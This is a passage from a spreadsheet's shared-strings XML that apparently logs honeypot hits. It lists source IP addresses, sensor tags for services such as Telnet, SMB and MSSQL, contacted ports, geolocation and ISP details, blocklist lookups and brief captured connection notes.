    <t>Zaporizhzhya</t>
  </si>
  <si>
    <t>687700</t>
  </si>
  <si>
    <t>47.8388</t>
  </si>
  <si>
    <t>35.1396</t>
  </si>
  <si>
    <t>::ffff:2e76:4e7e</t>
  </si>
  <si>
    <t>20959842e3df878965ab8f7587f9b17c</t>
  </si>
  <si>
    <t>46.119.118.169</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_NTP_H35&amp;&amp;SMA-LAB_IRC_H35&amp;&amp;SMA-LAB_IPP_H9&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_HTTPS_H20&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_SSH_H45&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;389&amp;&amp;123&amp;&amp;6667&amp;&amp;631&amp;&amp;6379&amp;&amp;443&amp;&amp;1080&amp;&amp;22&amp;&amp;42123&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2e77:76a9</t>
  </si>
  <si>
    <t>461b9550a24fb5273611af93fdf38411</t>
  </si>
  <si>
    <t>112.72.228.169</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;40317&amp;&amp;9063&amp;&amp;49002</t>
  </si>
  <si>
    <t>::ffff:7048:e4a9</t>
  </si>
  <si>
    <t>d4a63e3b2c560d7a149d1dc0463dbffa</t>
  </si>
  <si>
    <t>46.118.75.227</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:2e76:4be3</t>
  </si>
  <si>
    <t>50945bb95c85478afa5e9455a8f762c7</t>
  </si>
  <si>
    <t>178.137.180.212</t>
  </si>
  <si>
    <t>23&amp;&amp;49994&amp;&amp;19054&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b289:b4d4</t>
  </si>
  <si>
    <t>9d1201e886998a5a8321b202fa125381</t>
  </si>
  <si>
    <t>37.115.215.32</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>23&amp;&amp;36844&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2573:d720</t>
  </si>
  <si>
    <t>226e2b713b0c98ec36bde7375b5ea267</t>
  </si>
  <si>
    <t>203.192.210.34</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;20301&amp;&amp;NA</t>
  </si>
  <si>
    <t>Mumbai (Chakala Industrial Area)</t>
  </si>
  <si>
    <t>19.1205</t>
  </si>
  <si>
    <t>72.8694</t>
  </si>
  <si>
    <t>Entire In2Cable</t>
  </si>
  <si>
    <t>Indusind Media And Communication Ltd.</t>
  </si>
  <si>
    <t>::ffff:cbc0:d222</t>
  </si>
  <si>
    <t>1d531fd5d0ca6cb23e63b747909d1130</t>
  </si>
  <si>
    <t>37.229.162.139</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;24248&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:25e5:a28b</t>
  </si>
  <si>
    <t>9a61df3ffd2af4ce4acf0197b8a4d2b3</t>
  </si>
  <si>
    <t>176.8.55.85</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_HTTP_H40&amp;&amp;SMA-LAB_SSH_H30&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;22&amp;&amp;443&amp;&amp;36879&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b008:3755</t>
  </si>
  <si>
    <t>db9880d465e2aee9d77ae8f4ccf28703</t>
  </si>
  <si>
    <t>46.119.6.196</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;445&amp;&amp;40864&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2e77:6c4</t>
  </si>
  <si>
    <t>0e8092e7f136695984b2637719922edd</t>
  </si>
  <si>
    <t>61.64.18.55</t>
  </si>
  <si>
    <t>25.0798</t>
  </si>
  <si>
    <t>UBBNET</t>
  </si>
  <si>
    <t>::ffff:3d40:1237</t>
  </si>
  <si>
    <t>6fce16d758734d1544012c346b47f1f3</t>
  </si>
  <si>
    <t>5.134.248.247</t>
  </si>
  <si>
    <t>Damascus (Al Mazzeh)</t>
  </si>
  <si>
    <t>33.491</t>
  </si>
  <si>
    <t>36.243</t>
  </si>
  <si>
    <t>Syrian Telecom</t>
  </si>
  <si>
    <t>SAMANET</t>
  </si>
  <si>
    <t>2012-07-10</t>
  </si>
  <si>
    <t>::ffff:586:f8f7</t>
  </si>
  <si>
    <t>bdf0379ac569dcb1574705c7fc9fd512</t>
  </si>
  <si>
    <t>182.56.210.12</t>
  </si>
  <si>
    <t>::ffff:b638:d20c</t>
  </si>
  <si>
    <t>1f5af0a3cb5ed0c3be52c240dcb65926</t>
  </si>
  <si>
    <t>41.59.29.23</t>
  </si>
  <si>
    <t>::ffff:293b:1d17</t>
  </si>
  <si>
    <t>5ab43202dcc8271c3597ad77c99231cd</t>
  </si>
  <si>
    <t>92.52.150.158</t>
  </si>
  <si>
    <t>6746&amp;&amp;23</t>
  </si>
  <si>
    <t>Kyiv (Svyatoshyns'kyi District)</t>
  </si>
  <si>
    <t>50.4564</t>
  </si>
  <si>
    <t>30.382</t>
  </si>
  <si>
    <t>202103</t>
  </si>
  <si>
    <t>2010-10-12</t>
  </si>
  <si>
    <t>::ffff:5c34:969e</t>
  </si>
  <si>
    <t>27e6020ebe6b13a8c317177a033418c2</t>
  </si>
  <si>
    <t>209.212.212.70</t>
  </si>
  <si>
    <t>Kaafu Atoll</t>
  </si>
  <si>
    <t>Malé</t>
  </si>
  <si>
    <t>1282027</t>
  </si>
  <si>
    <t>4.17521</t>
  </si>
  <si>
    <t>73.5092</t>
  </si>
  <si>
    <t>::ffff:d1d4:d446</t>
  </si>
  <si>
    <t>6c0e2aa8c713181ded8080fd5a938d1c</t>
  </si>
  <si>
    <t>117.195.197.215</t>
  </si>
  <si>
    <t>::ffff:75c3:c5d7</t>
  </si>
  <si>
    <t>98b15780081eb976cdefcfb22c9e7b2a</t>
  </si>
  <si>
    <t>60.254.61.243</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>10394&amp;&amp;25430&amp;&amp;1433&amp;&amp;445&amp;&amp;38154</t>
  </si>
  <si>
    <t>19.8776</t>
  </si>
  <si>
    <t>75.3423</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (60.254.61.243,62177)}&amp;&amp;{Data_SMB:Incoming connection (60.254.61.243,62816)}&amp;&amp;{Data_SMB:Incoming connection (60.254.61.243,34551)}&amp;&amp;{Data_SMB:Incoming connection (60.254.61.243,34942)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:3cfe:3df3</t>
  </si>
  <si>
    <t>7510a4790b45fb0cbbcac0fe8d59dbf7</t>
  </si>
  <si>
    <t>37.37.253.226</t>
  </si>
  <si>
    <t>2012-01-03</t>
  </si>
  <si>
    <t>::ffff:2525:fde2</t>
  </si>
  <si>
    <t>794cf62502ae662e86e052ed43144c18</t>
  </si>
  <si>
    <t>120.62.179.46</t>
  </si>
  <si>
    <t>::ffff:783e:b32e</t>
  </si>
  <si>
    <t>c0972bb4c12fe0a4ebded1131ed005b4</t>
  </si>
  <si>
    <t>191.253.49.101</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;42341&amp;&amp;NA</t>
  </si>
  <si>
    <t>272539</t>
  </si>
  <si>
    <t>ENEVE TELECOMUNICACOES LTDA</t>
  </si>
  <si>
    <t>Eneve Telecomunicacoes Ltda</t>
  </si>
  <si>
    <t>::ffff:bffd:3165</t>
  </si>
  <si>
    <t>a3e36bc7bbe29a12810b7af7d1c51d71</t>
  </si>
  <si>
    <t>117.192.135.213</t>
  </si>
  <si>
    <t>::ffff:75c0:87d5</t>
  </si>
  <si>
    <t>9a7de316cce004a2a24aa7290ee1ed61</t>
  </si>
  <si>
    <t>61.1.128.152</t>
  </si>
  <si>
    <t>::ffff:3d01:8098</t>
  </si>
  <si>
    <t>071bc57da59eac01c74e905232044f07</t>
  </si>
  <si>
    <t>169.150.201.18</t>
  </si>
  <si>
    <t>Cdnext FRA</t>
  </si>
  <si>
    <t>1994-11-30</t>
  </si>
  <si>
    <t>::ffff:a996:c912</t>
  </si>
  <si>
    <t>eb4cb051194e377593b7b7128d71a1f6</t>
  </si>
  <si>
    <t>152.59.146.249</t>
  </si>
  <si>
    <t>Dhanbad</t>
  </si>
  <si>
    <t>Sijua</t>
  </si>
  <si>
    <t>1256335</t>
  </si>
  <si>
    <t>23.7762</t>
  </si>
  <si>
    <t>86.3303</t>
  </si>
  <si>
    <t>::ffff:983b:92f9</t>
  </si>
  <si>
    <t>36b451445e7bf9d3abee6f16a8ec83f3</t>
  </si>
  <si>
    <t>61.3.133.239</t>
  </si>
  <si>
    <t>::ffff:3d03:85ef</t>
  </si>
  <si>
    <t>387d898e1ebc0cecff07f539aa571a29</t>
  </si>
  <si>
    <t>211.223.52.34</t>
  </si>
  <si>
    <t>Mokpo-si</t>
  </si>
  <si>
    <t>1841063</t>
  </si>
  <si>
    <t>530-420</t>
  </si>
  <si>
    <t>34.799</t>
  </si>
  <si>
    <t>126.389</t>
  </si>
  <si>
    <t>::ffff:d3df:3422</t>
  </si>
  <si>
    <t>87cecfbf02a2c460ea6dd5541a5c903e</t>
  </si>
  <si>
    <t>125.16.189.232</t>
  </si>
  <si>
    <t>Kapurthala</t>
  </si>
  <si>
    <t>Phagwāra</t>
  </si>
  <si>
    <t>1259827</t>
  </si>
  <si>
    <t>31.2245</t>
  </si>
  <si>
    <t>75.7739</t>
  </si>
  <si>
    <t>::ffff:7d10:bde8</t>
  </si>
  <si>
    <t>efe486ab33533e4df23606750054fac5</t>
  </si>
  <si>
    <t>117.245.210.168</t>
  </si>
  <si>
    <t>::ffff:75f5:d2a8</t>
  </si>
  <si>
    <t>b8aa4390e209d1df169098329ed4c8e5</t>
  </si>
  <si>
    <t>115.37.186.225</t>
  </si>
  <si>
    <t>115-37-186-225.area7b.commufa.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>Aichi</t>
  </si>
  <si>
    <t>Nagoya</t>
  </si>
  <si>
    <t>1856057</t>
  </si>
  <si>
    <t>35.1814</t>
  </si>
  <si>
    <t>136.907</t>
  </si>
  <si>
    <t>18126</t>
  </si>
  <si>
    <t>Chubu Telecommunications Company, Inc.</t>
  </si>
  <si>
    <t>Chubu Telecommunications Co., Inc.</t>
  </si>
  <si>
    <t>2008-07-08</t>
  </si>
  <si>
    <t>commufa</t>
  </si>
  <si>
    <t>::ffff:7325:bae1</t>
  </si>
  <si>
    <t>ad4d5335aca23147d6bbb445b4c207ff</t>
  </si>
  <si>
    <t>106.51.101.238</t>
  </si>
  <si>
    <t>12.9846</t>
  </si>
  <si>
    <t>77.5973</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (106.51.101.238,51176)}&amp;&amp;{Data_SMB:Incoming connection (106.51.101.238,51182)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (106.51.101.238,51549)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (106.51.101.238,53290)}&amp;&amp;{Data_SMB:Incoming connection (106.51.101.238,53304)}&amp;&amp;{Data_SMB:Incoming connection (106.51.101.238,61719)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:6a33:65ee</t>
  </si>
  <si>
    <t>10d50baae498407253b21d63dcddf74e</t>
  </si>
  <si>
    <t>179.185.89.192</t>
  </si>
  <si>
    <t>Mato Grosso do Sul</t>
  </si>
  <si>
    <t>Campo Grande</t>
  </si>
  <si>
    <t>3467747</t>
  </si>
  <si>
    <t>-20.4428</t>
  </si>
  <si>
    <t>-54.6464</t>
  </si>
  <si>
    <t>18881</t>
  </si>
  <si>
    <t>Global Village Telecom</t>
  </si>
  <si>
    <t>::ffff:b3b9:59c0</t>
  </si>
  <si>
    <t>da415392ca9e21d3a7b4a6ef1eef7018</t>
  </si>
  <si>
    <t>103.151.212.110</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H47</t>
  </si>
  <si>
    <t>Narsingdi</t>
  </si>
  <si>
    <t>1185117</t>
  </si>
  <si>
    <t>23.935</t>
  </si>
  <si>
    <t>90.7234</t>
  </si>
  <si>
    <t>38493</t>
  </si>
  <si>
    <t>Royal Green Communication Limited</t>
  </si>
  <si>
    <t>Royal Green Limited</t>
  </si>
  <si>
    <t>2020-06-02</t>
  </si>
  <si>
    <t>ROYALGREENINC-BD</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.151.212.110,64707)}&amp;&amp;{Data_SMB:Incoming connection (103.151.212.110,64711)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.151.212.110,49235)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.151.212.110,63671)}&amp;&amp;{Data_SMB:Incoming connection (103.151.212.110,63678)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.151.212.110,64546)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:6797:d46e</t>
  </si>
  <si>
    <t>b6416307fda166ae17e0903d298eb8db</t>
  </si>
  <si>
    <t>115.98.193.18</t>
  </si>
  <si>
    <t>::ffff:7362:c112</t>
  </si>
  <si>
    <t>55fdddff7565b19d067e2e353da12712</t>
  </si>
  <si>
    <t>59.91.91.191</t>
  </si>
  <si>
    <t>::ffff:3b5b:5bbf</t>
  </si>
  <si>
    <t>46ca9144afead6889b87545778d231f2</t>
  </si>
  <si>
    <t>202.140.131.4</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>36776&amp;&amp;3306&amp;&amp;1433&amp;&amp;5718&amp;&amp;28607</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}</t>
  </si>
  <si>
    <t>::ffff:ca8c:8304</t>
  </si>
  <si>
    <t>47150461b8e5bbc1d308f9b29f7dd728</t>
  </si>
  <si>
    <t>49.47.195.6</t>
  </si>
  <si>
    <t>::ffff:312f:c306</t>
  </si>
  <si>
    <t>9055b3a2535bafb26961ac3ba0c21bcb</t>
  </si>
  <si>
    <t>167.57.76.104</t>
  </si>
  <si>
    <t>r167-57-76-104.dialup.adsl.anteldata.net.uy</t>
  </si>
  <si>
    <t>::ffff:a739:4c68</t>
  </si>
  <si>
    <t>666e16f3c5515798300a29802dabb48c</t>
  </si>
  <si>
    <t>14.255.72.135</t>
  </si>
  <si>
    <t>::ffff:eff:4887</t>
  </si>
  <si>
    <t>64f55fa96043175571fc69712a452468</t>
  </si>
  <si>
    <t>59.184.69.185</t>
  </si>
  <si>
    <t>::ffff:3bb8:45b9</t>
  </si>
  <si>
    <t>e9a06533101e543638ca565ebb1342a4</t>
  </si>
  <si>
    <t>14.102.110.117</t>
  </si>
  <si>
    <t>WORLDPHONE</t>
  </si>
  <si>
    <t>WPISPL</t>
  </si>
  <si>
    <t>::ffff:e66:6e75</t>
  </si>
  <si>
    <t>6ba37206dfb32ad7eeb3080c8f5d3b2f</t>
  </si>
  <si>
    <t>59.183.19.38</t>
  </si>
  <si>
    <t>Dorāha</t>
  </si>
  <si>
    <t>1272375</t>
  </si>
  <si>
    <t>30.7995</t>
  </si>
  <si>
    <t>76.0236</t>
  </si>
  <si>
    <t>::ffff:3bb7:1326</t>
  </si>
  <si>
    <t>53defda19a7efb4a3de64345cf81ab47</t>
  </si>
  <si>
    <t>169.150.201.6</t>
  </si>
  <si>
    <t>::ffff:a996:c906</t>
  </si>
  <si>
    <t>008b54adf33376ed5416b87f6a5269d6</t>
  </si>
  <si>
    <t>112.196.1.26</t>
  </si>
  <si>
    <t>Jalandhar</t>
  </si>
  <si>
    <t>1268782</t>
  </si>
  <si>
    <t>144001</t>
  </si>
  <si>
    <t>31.326</t>
  </si>
  <si>
    <t>75.5762</t>
  </si>
  <si>
    <t>St Soldier Educational Society</t>
  </si>
  <si>
    <t>St_Soldier_Educational_Society</t>
  </si>
  <si>
    <t>::ffff:70c4:11a</t>
  </si>
  <si>
    <t>025570552ae65736dd9ea60850e2c94d</t>
  </si>
  <si>
    <t>117.196.133.37</t>
  </si>
  <si>
    <t>::ffff:75c4:8525</t>
  </si>
  <si>
    <t>2ee90053f641859f847032446ca6cfbb</t>
  </si>
  <si>
    <t>103.196.30.194</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H16</t>
  </si>
  <si>
    <t>2015-09-15</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.196.30.194,64305)}&amp;&amp;{Data_SMB:Incoming connection (103.196.30.194,64925)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67c4:1ec2</t>
  </si>
  <si>
    <t>ad432a6afef0a4772b7d46e8e4eaee84</t>
  </si>
  <si>
    <t>115.79.62.21</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1803&amp;&amp;22&amp;&amp;16426&amp;&amp;3306&amp;&amp;1433</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}</t>
  </si>
  <si>
    <t>::ffff:734f:3e15</t>
  </si>
  <si>
    <t>03f0c5ddb5c3284b89f6de510402a980</t>
  </si>
  <si>
    <t>117.193.103.42</t>
  </si>
  <si>
    <t>::ffff:75c1:672a</t>
  </si>
  <si>
    <t>4a0fce19f08c2df05fab8c403b995cc3</t>
  </si>
  <si>
    <t>103.211.135.41</t>
  </si>
  <si>
    <t>2016-03-15</t>
  </si>
  <si>
    <t>GTPLKCBPL</t>
  </si>
  <si>
    <t>::ffff:67d3:8729</t>
  </si>
  <si>
    <t>360865399e19c4e2fa255223b286e1c6</t>
  </si>
  <si>
    <t>103.30.65.15</t>
  </si>
  <si>
    <t>::ffff:671e:410f</t>
  </si>
  <si>
    <t>f8907c891a43e95cbf3685827d4c7de2</t>
  </si>
  <si>
    <t>103.153.246.228</t>
  </si>
  <si>
    <t>1433&amp;&amp;3306&amp;&amp;445&amp;&amp;59750&amp;&amp;59586</t>
  </si>
  <si>
    <t>Kudus Regency</t>
  </si>
  <si>
    <t>Kudus</t>
  </si>
  <si>
    <t>1639215</t>
  </si>
  <si>
    <t>-6.8048</t>
  </si>
  <si>
    <t>110.84</t>
  </si>
  <si>
    <t>140475</t>
  </si>
  <si>
    <t>PT Citra Celebas Multimedia</t>
  </si>
  <si>
    <t>PRIMAHOME</t>
  </si>
  <si>
    <t>2020-07-30</t>
  </si>
  <si>
    <t>PRIMAHOME-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.153.246.228,57423)}&amp;&amp;{Data_SMB:Incoming connection (103.153.246.228,58155)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:6799:f6e4</t>
  </si>
  <si>
    <t>73161ddf1450f235a97746961f3f70d8</t>
  </si>
  <si>
    <t>117.206.137.253</t>
  </si>
  <si>
    <t>::ffff:75ce:89fd</t>
  </si>
  <si>
    <t>7b9472e33ae47cabc5c59b7907fc3f54</t>
  </si>
  <si>
    <t>223.178.215.161</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H12</t>
  </si>
  <si>
    <t>1433&amp;&amp;32438&amp;&amp;445&amp;&amp;3389</t>
  </si>
  <si>
    <t>login&amp;&amp;connection&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (223.178.215.161,62429)}&amp;&amp;{Data_SMB:Incoming connection (223.178.215.161,63773)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}</t>
  </si>
  <si>
    <t>::ffff:dfb2:d7a1</t>
  </si>
  <si>
    <t>48eedc9680fb48b6460518b611657a71</t>
  </si>
  <si>
    <t>182.19.12.158</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;977&amp;&amp;1433&amp;&amp;3306</t>
  </si>
  <si>
    <t>Hyderabad (Basant Nagar Colony)</t>
  </si>
  <si>
    <t>17.3932</t>
  </si>
  <si>
    <t>78.4917</t>
  </si>
  <si>
    <t>55410</t>
  </si>
  <si>
    <t>Vodafone Idea Ltd. (VIL)</t>
  </si>
  <si>
    <t>Vodafone Idea Ltd.</t>
  </si>
  <si>
    <t>VIL-IN</t>
  </si>
  <si>
    <t>::ffff:b613:c9e</t>
  </si>
  <si>
    <t>b282864f808d432bd0e7432f929b25a7</t>
  </si>
  <si>
    <t>59.182.155.87</t>
  </si>
  <si>
    <t>::ffff:3bb6:9b57</t>
  </si>
  <si>
    <t>b7ef6d8d43141061aad8b0570c59c7dd</t>
  </si>
  <si>
    <t>117.211.128.136</t>
  </si>
  <si>
    <t>::ffff:75d3:8088</t>
  </si>
  <si>
    <t>b582a845517d25a4aebce68fafdb38be</t>
  </si>
  <si>
